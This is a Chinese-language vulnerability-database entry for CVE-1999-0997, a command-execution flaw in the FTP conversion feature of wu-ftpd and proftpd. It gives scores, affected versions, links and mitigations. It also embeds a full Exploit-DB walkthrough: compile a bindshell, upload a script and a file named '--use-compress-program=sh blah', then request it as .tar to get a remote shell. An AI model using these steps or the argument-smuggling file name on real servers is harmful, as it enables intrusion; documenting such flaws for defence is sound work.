CVE-1999-0997
CVSS7.5
发布时间 :1999-12-20 00:00:00
修订时间 :2008-09-05 16:18:28
NMCOE    

[原文]wu-ftp with FTP conversion enabled allows an attacker to execute commands via a malformed file name that is interpreted as an argument to the program that does the conversion, e.g. tar or uncompress.


[CNNVD]多家厂商FTP"转换"功能远程执行命令漏洞(CNNVD-199912-062)

        
        一些FTP服务器提供一种"转换"功能,在把文件发送给用户之前,先把文件pipe给一个程序进行处理。
        某些FTP服务器配置上存在漏洞,远程攻击者可以利用"转换"功能在服务器上执行任意命令。
        FTP客户端请求获取一个文件名,其后跟随.tar/.tar.gz/.Z/.gz的时候,某些FTP Server会自动执行/bin/tar之类的程序去打包、压缩并下载给FTP客户端,这是通过管道实现的。而tar这样的命令有能力执行任意命令,入侵者通过请求一个特殊的文件名而使FTP Server启动远程shell。现在已知在某些平台(如Linux)下的wu-ftpd 2.6.0及以下版本FTP服务器和proftpd FTP服务器受此漏洞影响,利用这个漏洞需要攻击者有上传文件的权限。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:university_of_washington:wu-ftpd:2.4.2
cpe:/o:redhat:linux:6.1Red Hat Linux 6.1
cpe:/a:university_of_washington:wu-ftpd:2.5.0
cpe:/a:university_of_washington:wu-ftpd:2.6.0
cpe:/o:redhat:linux:6.0Red Hat Linux 6.0
cpe:/o:redhat:linux:5.2Red Hat Linux 5.2
cpe:/a:millenux_gmbh:anonftp:2.8.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0997
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0997
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-062
(官方数据源) CNNVD

- 其它链接及资源

http://www.debian.org/security/2003/dsa-377
(UNKNOWN)  DEBIAN  DSA-377

- 漏洞信息

多家厂商FTP"转换"功能远程执行命令漏洞
高危 未知
1999-12-20 00:00:00 2005-09-12 00:00:00
远程  
        
        一些FTP服务器提供一种"转换"功能,在把文件发送给用户之前,先把文件pipe给一个程序进行处理。
        某些FTP服务器配置上存在漏洞,远程攻击者可以利用"转换"功能在服务器上执行任意命令。
        FTP客户端请求获取一个文件名,其后跟随.tar/.tar.gz/.Z/.gz的时候,某些FTP Server会自动执行/bin/tar之类的程序去打包、压缩并下载给FTP客户端,这是通过管道实现的。而tar这样的命令有能力执行任意命令,入侵者通过请求一个特殊的文件名而使FTP Server启动远程shell。现在已知在某些平台(如Linux)下的wu-ftpd 2.6.0及以下版本FTP服务器和proftpd FTP服务器受此漏洞影响,利用这个漏洞需要攻击者有上传文件的权限。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 这种入侵技术要求可以上载文件,正确配置FTP Server,禁止用户上载文件。
        * 配置FTP服务器,取消用户在服务器端执行压缩和解压的能力。
        厂商补丁:
        Washington University
        ---------------------
        目前厂商已经最新版本的软件中修复了这个安全问题,请到厂商的主页下载:
        
        http://www.wu-ftpd.org/

- 漏洞信息 (20563)

wu-ftpd 2.4.2/2.5 .0/2.6 .0/2.6.1/2.6.2 FTP Conversion Vulnerability (EDBID:20563)
unix remote
1999-12-20 Verified
0 suid
N/A [点击下载]
source: http://www.securityfocus.com/bid/2240/info

Some FTP servers provide a "conversion" service that pipes a requested file through a program, for example a decompression utility such as "tar", before it is passed to the remote user. Under some configurations where this is enabled a remote user can pass a filename beginning with a minus sign to FTP, which will pass this as an argument to the compression/archiver program (where it will be erroneously treated as a command line argument other than a filename). It may be possible to exploit this and execute commands on a remote machine. An example of this exploits the "--use-compress-program PROG" parameter passed to tar; if PROG refers to a program that is accessible to the FTP server, it will be executed. The remote user must have access to a writeable directory in order to exploit this. See exploit for details. 

With a valid FTP account only the server, the difficulty goes right down. You also have the added
benefit of not being stuck in a chroot() environment at the end. Local exploit time.

The exploit goes along much the same lines as the anonymous FTP exploit does:

Create a backdoor, using bindshell from our previous example:

$ gcc bindshell.c -o b -static

If you can perform a SITE CHMOD (default for normal non-anon users on wu-ftpd), then you can
use the following script example. Create a script to exec the desired commands:

$ cat > blah
#!/bin/bash
./b &
^D

Now create empty file "--use-compress-program=bash blah"

$ > "--use-compress-program=bash blah"

FTP to your target, login with your username/password. Upload your 3 files:

ftp> put b
ftp> put blah
ftp> put "--use-compress-program=bash blah"

Do a SITE CHMOD for b and blah:

ftp> quote SITE CHMOD 0755 b
ftp> quote SITE CHMOD 0755 blah

Now get your file:

ftp> get "--use-compress-program=bash blah".tar

Thats all there is to it. You now should have a shell on whatever port you specified.

---

An alternative exploit that bypasses the need to use SITE CHMOD has been suggested by SecuriTeam.com (this can be accomplished over anonymous FTP):

"This vulnerability is simple to exploit. However to exploit it you must be able to upload/download files. (e.g. a mode 0777 incoming directory).

For the purposes of this exploit you also need a shell in the remote path. For example, a RedHat machine with the anonftp package installed has exactly what you need.

First, assuming you are running the same platform as your target, statically compile some sort of backdoor program. A simple example is bindshell.c.

$ gcc bindshell.c -o b -static

Then, tar this up. You will need to tar it up because the remote side will rarely have the ability to change permissions at this stage.
(SITE CHMOD rarely works on anonymous ftp sites)

$ tar -cf b.tar b

Create a script of things you want to do on the remote site, this will be interpreted by bash or sh.

$ cat > blah
#
/bin/tar -xf b.tar
./b
^D

Leave the first line as a comment.

Create a empty file called "--use-compress-program=sh blah"

$ > "--use-compress-program=sh blah"

Connect to your target ftp server.

$ ftp localhost
Connected to localhost.
220 localhost.localdomain FTP server (Version wu-2.6.0(1) Tue Sep 21 10:10:10 EDT 2000) ready.
Name (localhost:suid): ftp
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Change to your world writeable directory:

ftp> cd /incoming

Store your files:

ftp> put blah
ftp> put b.tar
ftp> put "--use-compress-program=sh blah"

Now using TAR conversion, get your "--use-compress-program=sh blah" file.

ftp> get "--use-compress-program=sh blah".tar

It should open a connection then freeze. Now telnet to your bindshell port." 		

- 漏洞信息

1736
WU-FTPD FTP Conversion Service Malformed File Name Handling Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

1999-12-19 Unknow
1999-12-19 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站